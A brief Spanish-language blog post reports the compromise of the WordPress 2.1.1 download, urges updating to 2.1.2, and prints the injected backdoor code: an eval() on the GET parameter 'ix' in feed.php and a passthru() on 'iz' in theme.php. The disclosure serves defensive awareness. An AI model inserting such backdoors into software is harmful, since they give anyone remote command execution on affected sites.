Blog, IT Security

WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

  • wp-includes/feed.php
    function comment_text_phpfilter($filterdata) {
        eval($filterdata);
    }
    
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
    
  • wp-includes/theme.php
    function get_theme_mcommand($mcds) {
      passthru($mcds);
    }
    
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
    

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.